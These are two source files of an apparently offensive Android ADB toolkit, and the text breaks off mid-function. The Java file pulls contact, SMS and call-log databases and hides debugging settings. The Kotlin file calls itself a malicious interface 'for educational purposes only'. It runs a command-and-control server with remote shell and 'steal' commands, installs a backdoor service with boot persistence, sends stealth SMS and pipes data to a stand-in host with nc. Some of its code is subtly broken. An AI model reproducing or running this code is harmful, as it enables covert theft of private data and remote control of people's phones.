File: Src/ADB/ADBBase.java
package Src.ADB;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import Src.Utils.Logger;

public class ADBBase {

    private Logger logger = new Logger();

    public static class ADBExecutionException extends RuntimeException {
        public ADBExecutionException(String message, Throwable cause) {
            super(message, cause);
        }
        public ADBExecutionException(String message) {
            super(message);
        }
    }

    // Method to start adb server
    public void startADBServer() {
        logger.info("Starting ADB server");
        executeCommand("adb start-server");
    }

    // Method to stop adb server
    public void stopADBServer() {
        logger.info("Stopping ADB server");
        executeCommand("adb kill-server");
    }

    // Method to execute adb commands
    public String executeCommand(String command) {
        logger.info("Executing command: " + command);
        StringBuilder output = new StringBuilder();
        try {
            Process process = Runtime.getRuntime().exec(command);
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append("\n");
            }
            reader.close();
            int exitCode = process.waitFor();
            if (exitCode != 0) {
                // Optionally read the error stream for more details
                BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
                StringBuilder errorOutput = new StringBuilder();
                String errorLine;
                while ((errorLine = errorReader.readLine()) != null) {
                    errorOutput.append(errorLine).append("\n");
                }
                errorReader.close();
                logger.error("ADB command failed (exit code " + exitCode + "): " + command + "\nError output:\n" + errorOutput.toString());
                throw new ADBExecutionException("ADB command failed (exit code " + exitCode + "): " + command + "\nError output:\n" + errorOutput.toString());
            }
        } catch (IOException e) {
            logger.error("Error executing ADB command: " + command, e);
            throw new ADBExecutionException("Error executing ADB command: " + command, e);
        } catch (InterruptedException e) {
            logger.error("ADB command execution interrupted: " + command, e);
            Thread.currentThread().interrupt(); // Re-interrupt the current thread
            throw new ADBExecutionException("ADB command execution interrupted: " + command, e);
        }
        return output.toString();
    }

    // Method to run adb server without requiring a PC
    public void runADBServerWithoutPC() {
        logger.info("Running ADB server without PC");
        executeCommand("adb tcpip 5555");
    }

    // Method to simulate hacking by executing a command to access device files
    public void hackDevice() {
        logger.warning("Simulating device hack");
        executeCommand("adb shell ls /data");
    }

    // Method to simulate defense by checking for unauthorized access and stopping the ADB server
    public void defendAgainstHack() {
        logger.warning("Simulating defense against hack");
        String output = executeCommand("adb shell ls /data");
        if (output.contains("unauthorized")) {
            logger.error("Unauthorized access detected, stopping ADB server");
            stopADBServer();
        }
    }

    // Method to test the lifecycle methods of an Android broadcast receiver
    public void testBroadcastReceiverLifecycle() {
        logger.info("Testing broadcast receiver lifecycle");
        executeCommand("adb shell am broadcast -a android.intent.action.BOOT_COMPLETED");
    }

    // Method to test the interaction between broadcast receivers and other components
    public void testBroadcastReceiverInteraction() {
        logger.info("Testing broadcast receiver interaction");
        executeCommand("adb shell am broadcast -a android.intent.action.SCREEN_ON");
    }

    // Method to test the handling of different types of broadcast messages
    public void testBroadcastReceiverHandling() {
        logger.info("Testing broadcast receiver handling");
        executeCommand("adb shell am broadcast -a com.example.CUSTOM_BROADCAST");
    }

    // Method to test the lifecycle methods of an Android activity
    public void testActivityLifecycle(String packageName, String activityName) {
        logger.info("Testing activity lifecycle for " + packageName + "/" + activityName);
        executeCommand("adb shell am start -n " + packageName + "/" + activityName);
        executeCommand("adb shell am force-stop " + packageName);
    }

    // Method to test the interaction between activities
    public void testActivityInteraction(String packageName, String firstActivityName, String secondActivityName) {
        logger.info("Testing activity interaction between " + packageName + "/" + firstActivityName + " and " + packageName + "/" + secondActivityName);
        executeCommand("adb shell am start -n " + packageName + "/" + firstActivityName);
        executeCommand("adb shell am start -n " + packageName + "/" + secondActivityName);
        executeCommand("adb shell am force-stop " + packageName);
    }

    // Method to test the UI elements of an activity
    public void testActivityUIElements(String packageName, String activityName, int x, int y, String text) {
        logger.info("Testing UI elements of " + packageName + "/" + activityName);
        executeCommand("adb shell am start -n " + packageName + "/" + activityName);
        executeCommand("adb shell input tap " + x + " " + y);
        if (text != null && !text.isEmpty()) {
            executeCommand("adb shell input text '" + text + "'");
        }
        executeCommand("adb shell am force-stop " + packageName);
    }

    // Method to test the lifecycle methods of an Android service
    public void testServiceLifecycle(String packageName, String serviceName) {
        logger.info("Testing service lifecycle for " + packageName + "/" + serviceName);
        executeCommand("adb shell am startservice -n " + packageName + "/" + serviceName);
        executeCommand("adb shell am stopservice -n " + packageName + "/" + serviceName);
    }

    // Method to test the interaction between services and other components
    public void testServiceInteraction(String packageName, String serviceName, String broadcastAction) {
        logger.info("Testing service interaction for " + packageName + "/" + serviceName + " with broadcast " + broadcastAction);
        executeCommand("adb shell am startservice -n " + packageName + "/" + serviceName);
        executeCommand("adb shell am broadcast -a " + broadcastAction);
        executeCommand("adb shell am stopservice -n " + packageName + "/" + serviceName);
    }

    // Method to test the background processing capabilities of a service
    public void testServiceBackgroundProcessing(String packageName, String serviceName) {
        logger.info("Testing background processing of " + packageName + "/" + serviceName);
        executeCommand("adb shell am startservice -n " + packageName + "/" + serviceName);
        executeCommand("adb shell am force-stop " + packageName);
    }

    // Method to enable full wireless control of the device
    public void enableWirelessControl() {
        logger.info("Enabling wireless control of the device");
        executeCommand("adb tcpip 5555");
        String ipAddressOutput = executeCommand("adb shell ip -f inet addr show wlan0");
        // Simple parsing to extract the IP address
        String ipAddress = null;
        String[] lines = ipAddressOutput.split("\n");
        for (String line : lines) {
            if (line.contains("inet ") && !line.contains("127.0.0.1")) {
                int start = line.indexOf("inet ") + 5;
                int end = line.indexOf("/", start);
                if (end > start) {
                    ipAddress = line.substring(start, end).trim();
                    break;
                }
            }
        }
        if (ipAddress != null) {
            executeCommand("adb connect " + ipAddress + ":5555");
            logger.info("Attempting to connect to: " + ipAddress + ":5555");
        } else {
            logger.warning("Could not parse IP address from ADB output.");
        }
    }

    // Method to extract data from the device using ADB commands
    public void extractData(String sourcePath, String destinationPath) {
        logger.info("Extracting data from " + sourcePath + " to " + destinationPath);
        executeCommand("adb pull " + sourcePath + " " + destinationPath);
    }

    // Method to extract contacts from the device using ADB commands
    public void extractContacts(String destinationPath) {
        logger.info("Extracting contacts to " + destinationPath);
        extractData("/data/data/com.android.providers.contacts/databases/contacts2.db", destinationPath);
    }

    // Method to extract SMS messages from the device using ADB commands
    public void extractSMS(String destinationPath) {
        logger.info("Extracting SMS messages to " + destinationPath);
        extractData("/data/data/com.android.providers.telephony/databases/mmssms.db", destinationPath);
    }

    // Method to extract call logs from the device using ADB commands
    public void extractCallLogs(String destinationPath) {
        logger.info("Extracting call logs to " + destinationPath);
        extractData("/data/data/com.android.providers.contacts/databases/calllog.db", destinationPath);
    }

    // Method to extract files from the device using ADB commands
    public void extractFiles(String sourcePath, String destinationPath) {
        logger.info("Extracting files from " + sourcePath + " to " + destinationPath);
        extractData(sourcePath, destinationPath);
    }

    // Method to trace the IP address of the device using ADB commands
    public String traceIPAddress() {
        logger.info("Tracing IP address of the device");
        return executeCommand("adb shell ip -f inet addr show wlan0");
    }

    // Method to enable stealth mode by disabling notifications and hiding the ADB connection from the user
    public void enableStealthMode() {
        logger.info("Enabling stealth mode");
        executeCommand("adb shell settings put global adb_enabled 0");
        executeCommand("adb shell settings put global development_settings_enabled 0");
        executeCommand("adb shell settings put global usb_debugging_enabled 0");
    }
}

File: Src/Main/kotlin/Src/ADB/ADBBase.kt
package Src.ADB

import Src.Utils.Logger
import kotlinx.coroutines.*
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.flow
import java.io.*
import java.net.ServerSocket
import java.net.Socket
import java.util.Properties
import java.util.concurrent.TimeUnit
import kotlin.random.Random

/**
 * A refined malicious ADB interface with enhanced features and asynchronous operations.
 * For educational purposes only.
 */
class ADBBase(private val logger: Logger = Logger()) {

    private val config = MaliciousConfig()
    private val c2ConfigLoader = C2ConfigLoader(logger) // Instantiate the loader
    private val c2Settings = c2ConfigLoader.loadConfig() // Load the configuration
    private val agentId = "android_${System.currentTimeMillis().toHexString()}"
    private var c2ServerSocket: ServerSocket? = null

    /**
     * Configuration for malicious operations.
     */
    data class MaliciousConfig(
        val tcpPort: Int = 5555,
        val commandTimeoutSeconds: Long = 15, // Increased timeout
        val silentMode: Boolean = true,
        val obfuscationDelayMs: Long = Random.nextLong(200, 1200)
    )

    /**
     * Represents the result of an ADB command execution.
     */
    data class CommandResult(val output: String, val error: String, val exitCode: Int)

    /**
     * Executes an ADB command asynchronously.
     */
    private fun executeAdbCommandAsync(command: List<String>): Flow<CommandResult> = flow {
        val processBuilder = ProcessBuilder(command)
        try {
            val process = processBuilder.start()
            val outputReader = BufferedReader(InputStreamReader(process.inputStream))
            val errorReader = BufferedReader(InputStreamReader(process.errorStream))
            val output = StringBuilder()
            val error = StringBuilder()

            val outputJob = launch(Dispatchers.IO) {
                outputReader.forEachLine { output.append(it).append("\n") }
            }
            val errorJob = launch(Dispatchers.IO) {
                errorReader.forEachLine { error.append(it).append("\n") }
            }

            val exitCode = withTimeoutOrNull(config.commandTimeoutSeconds * 1000) {
                awaitAll(outputJob, errorJob)
                process.waitFor()
            } ?: -1 // Indicate timeout

            emit(CommandResult(output.toString(), error.toString(), exitCode))
        } catch (e: IOException) {
            emit(CommandResult("", "Error executing command: ${e.message}", -1))
        }
    }

    /**
     * Executes a single ADB command and returns the result.
     */
    private suspend fun executeAdbCommand(command: String, logMessage: String): CommandResult {
        obfuscateExecution()
        logger.info(logMessage)
        return executeAdbCommandAsync(command.split(" ")).collect { return@collect it }
    }

    /**
     * Executes a batch of ADB commands sequentially.
     */
    private suspend fun executeAdbBatch(commands: List<String>, logMessage: String) {
        logger.info(logMessage)
        commands.forEach { cmd ->
            val result = executeAdbCommand(cmd, "Executing batch command: $cmd")
            if (result.exitCode != 0) {
                logger.warning("Batch command '$cmd' failed: ${result.error}")
            }
            delay(config.obfuscationDelayMs) // Add delay between commands
        }
    }

    private fun obfuscateExecution() {
        if (config.silentMode) {
            runBlocking { delay(config.obfuscationDelayMs) }
        }
    }

    private suspend fun parseIpAddress(output: String): String? {
        val pattern = Pattern.compile("inet (\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})")
        val matcher = pattern.matcher(output)
        return if (matcher.find()) matcher.group(1) else null
    }

    // --- C2 Server Functionality ---

    private fun getC2ServerPort(): Int = c2Settings.serverPort
    private fun getC2ServerIp(): String = c2Settings.serverIp
    private fun getC2ServerProtocol(): String = c2Settings.communicationProtocol

    /** Starts the C2 server on the Android device. */
    fun startC2Server() = CoroutineScope(Dispatchers.IO).launch {
        val port = getC2ServerPort()
        try {
            c2ServerSocket = ServerSocket(port)
            logger.info("C2 server started on port $port")
            while (isActive) {
                val clientSocket = c2ServerSocket?.accept()
                clientSocket?.let { launch { handleC2Client(it) } }
            }
        } catch (e: IOException) {
            logger.warning("Error starting C2 server: ${e.message}")
        } finally {
            c2ServerSocket?.close()
        }
    }

    /** Handles communication with a connected C2 client. */
    private suspend fun handleC2Client(clientSocket: Socket) {
        try {
            val reader = BufferedReader(InputStreamReader(clientSocket.getInputStream()))
            val writer = PrintWriter(clientSocket.getOutputStream(), true)
            writer.println("Android C2 server ready.")

            var command: String?
            while (isActive && reader.readLine().also { command = it } != null) {
                logger.info("Received C2 command from ${clientSocket.inetAddress.hostAddress}: $command")
                val response = executeC2Command(command)
                writer.println(response)
            }
            logger.info("C2 client disconnected: ${clientSocket.inetAddress.hostAddress}")
            clientSocket.close()
        } catch (e: IOException) {
            logger.warning("Error handling C2 client: ${e.message}")
        }
    }

    /** Executes commands received from the C2 client. */
    private suspend fun executeC2Command(command: String): String = when {
        command.startsWith("shell ") -> {
            val shellCommand = command.substringAfter("shell ").trim()
            executeMaliciousCommand(shellCommand).output.trim()
        }
        command.startsWith("steal ") -> {
            val path = command.substringAfter("steal ").trim()
            val destination = "/sdcard/c2_exfil"
            try {
                stealData(path, destination)
                "Data stolen from $path to $destination"
            } catch (e: ADBExploitException) {
                "Error stealing data: ${e.message}"
            }
        }
        command == "get_ip" -> getDeviceIpAddress() ?: "Could not retrieve IP address"
        command == "get_model" -> getDeviceModel()
        command == "list_downloads" -> listFiles("/sdcard/Download")
        command == "reboot" -> {
            rebootDevice()
            "Rebooting device..."
        }
        else -> "Unknown command: $command"
    }

    /** Stops the C2 server. */
    fun stopC2Server() {
        runBlocking {
            try {
                c2ServerSocket?.close()
                logger.info("C2 server stopped.")
            } catch (e: IOException) {
                logger.warning("Error stopping C2 server: ${e.message}")
            }
        }
    }

    // --- Core ADB Interaction Functions (Refactored for Async) ---

    suspend fun prepareAttack() {
        executeAdbBatch(
            listOf(
                "settings put global adb_enabled 0",
                "settings put global development_settings_enabled 0",
                "settings put global usb_debugging_enabled 0",
                "settings put global notification_access 0",
                "input keyevent 26"
            ), "Enabling stealth mode"
        )
        establishPersistentAccess()
        schedulePersistentTask()
        enableBootPersistence()
        listFiles("/sdcard/Download")
        trackIPAddress()
        startC2Server()
    }

    private suspend fun establishPersistentAccess() {
        val tcpResult = executeAdbCommand("tcpip ${config.tcpPort}", "Setting up TCP/IP on port ${config.tcpPort}")
        if (tcpResult.exitCode != 0) logger.warning("TCP/IP setup failed: ${tcpResult.error}")

        val ipOutput = executeAdbCommand("shell ip -f inet addr show wlan0", "Fetching device IP").output
        val ipAddress = parseIpAddress(ipOutput)
        ipAddress?.let {
            val connectResult = executeAdbCommand("connect $it:${config.tcpPort}", "Connecting to $it:${config.tcpPort}")
            if (connectResult.exitCode != 0) logger.warning("Connection failed: ${connectResult.error}")
            executeAdbCommand("shell am start-service -n com.malicious/.BackdoorService", "Installing backdoor service")
        } ?: logger.warning("Could not retrieve device IP.")
    }

    private suspend fun listFiles(path: String = "/sdcard/"): String =
        executeAdbCommand("shell ls -l '$path'", "Listing files in $path").output.trim()

    private suspend fun pullFile(devicePath: String, localPath: String) {
        val result = executeAdbCommand("pull '$devicePath' '$localPath'", "Pulling '$devicePath' to '$localPath'")
        if (result.exitCode != 0) logger.warning("File pull failed: ${result.error}")
    }

    private suspend fun pushFile(localPath: String, devicePath: String) {
        val result = executeAdbCommand("push '$localPath' '$devicePath'", "Pushing '$localPath' to '$devicePath'")
        if (result.exitCode != 0) logger.warning("File push failed: ${result.error}")
    }

    private suspend fun installApk(apkPath: String) {
        val result = executeAdbCommand("install -r '$apkPath'", "Installing APK: $apkPath")
        if (result.exitCode != 0) logger.warning("APK install failed: ${result.error}")
    }

    private suspend fun uninstallApp(packageName: String) {
        val result = executeAdbCommand("uninstall '$packageName'", "Uninstalling app: $packageName")
        if (result.exitCode != 0) logger.warning("App uninstall failed: ${result.error}")
    }

    private suspend fun clearAppData(packageName: String) {
        val result = executeAdbCommand("shell pm clear '$packageName'", "Clearing data for $packageName")
        if (result.exitCode != 0) logger.warning("Clear app data failed: ${result.error}")
    }

    suspend fun rebootDevice() {
        executeAdbCommand("reboot", "Rebooting device")
    }

    suspend fun takeScreenshot(filename: String = "/sdcard/screenshot.png") {
        executeAdbCommand("shell screencap '$filename'", "Taking screenshot to $filename")
        pullFile(filename, filename) // Pull to local for demonstration
    }

    suspend fun getDeviceModel(): String =
        executeAdbCommand("shell getprop ro.product.model", "Getting device model").output.trim()

    suspend fun getDeviceSerialNumber(): String =
        executeAdbCommand("shell getprop ro.serialno", "Getting device serial number").output.trim()

    suspend fun getAndroidVersion(): String =
        executeAdbCommand("shell getprop ro.build.version.release", "Getting Android version").output.trim()

    suspend fun readLogcat(): String =
        executeAdbCommand("logcat -d", "Reading logcat").output.trim()

    suspend fun isDeviceRooted(): Boolean =
        executeAdbCommand("shell su -c 'whoami'", "Checking root status").output.contains("root", ignoreCase = true)

    suspend fun isAdbAccessible(): Boolean =
        executeAdbCommand("get-state", "Checking ADB accessibility").output.contains("device", ignoreCase = true)

    private suspend fun schedulePersistentTask() {
        val alarmId = Random.nextInt(1000, 9999)
        val intentAction = "com.malicious.ACTION_PERSISTENT"
        val command = "shell am set-alarm -c -a '$intentAction' -w 60 com.malicious"
        executeAdbCommand(command, "Scheduling persistent task (ID: $alarmId, Action: $intentAction)")
        logger.info("Note: Requires a receiver on the device.")
    }

    private suspend fun enableBootPersistence() {
        val command = "shell su -c 'pm enable com.malicious/.BootReceiver'"
        executeAdbCommand(command, "Attempting boot persistence via BootReceiver")
        logger.info("Note: Requires a BootReceiver in the manifest and root.")
    }

    private suspend fun sendStealthSMS(phoneNumber: String, data: String) {
        val command = "shell am start -a android.intent.action.SENDTO -d sms:$phoneNumber --es sms_body \"$data\" --ez android.intent.extra.TEXT_ONLY true --ez android.intent.extra.SEND_EMPTY_BODY true"
        executeAdbCommand(command, "Sending stealth SMS to $phoneNumber")
    }

    private suspend fun uploadDataStealthily(data: String, uploadUrl: String = "http://fake-cloud.com/upload") {
        executeAdbCommand("shell sh -c 'echo \"$data\" | nc $uploadUrl 80'", "Simulating data upload")
    }

    private suspend fun extractTargetedContacts(keywords: List<String>): String {
        val query = keywords.joinToString("%' OR display_name LIKE '%")
        val command = "shell sqlite3 /data/data/com.android.providers.contacts/databases/contacts2.db \"SELECT display_name FROM contacts WHERE display_name LIKE '%$query%'\""
        return executeAdbCommand(command, "Extracting contacts matching keywords").output.trim()
    }

    private suspend fun executeMaliciousCommand(command: String): CommandResult {
        val rooted = isDeviceRooted()
        val finalCommand = if (rooted) "shell su -c '$command'" else "shell $command"
        return executeAdbCommand(finalCommand, "Executing malicious command: $command")
    }

    private suspend fun stealData(sourcePath: String, destinationPath: String) {
        val rooted = isDeviceRooted()
        val command = if (rooted) "shell su -c cp '$sourcePath' /sdcard/temp && pull /sdcard/temp '$destinationPath' && shell rm /sdcard/temp"
        else "pull '$sourcePath' '$destinationPath'"
        executeAdbCommand(command, "Stealing data from $sourcePath to $destinationPath")
    }

    private suspend fun dumpSystemInfo(destinationPath: String) {
        executeAdbBatch(
            listOf(
                "shell dumpsys account > '$destinationPath/accounts.txt'",
                "shell pm list packages -f > '$destinationPath/packages.txt'",
                "shell settings list global > '$destinationPath/settings.txt'",
                "shell getprop > '$destinationPath/properties.txt'"
            ), "Dumping system info to $destinationPath"
        )
    }

    suspend fun simulateRansomware() {
        executeAdbBatch(
            listOf("input keyevent 26", "shell am broadcast -a com.android.systemui.demo --es command enter --es mode ransom --es message
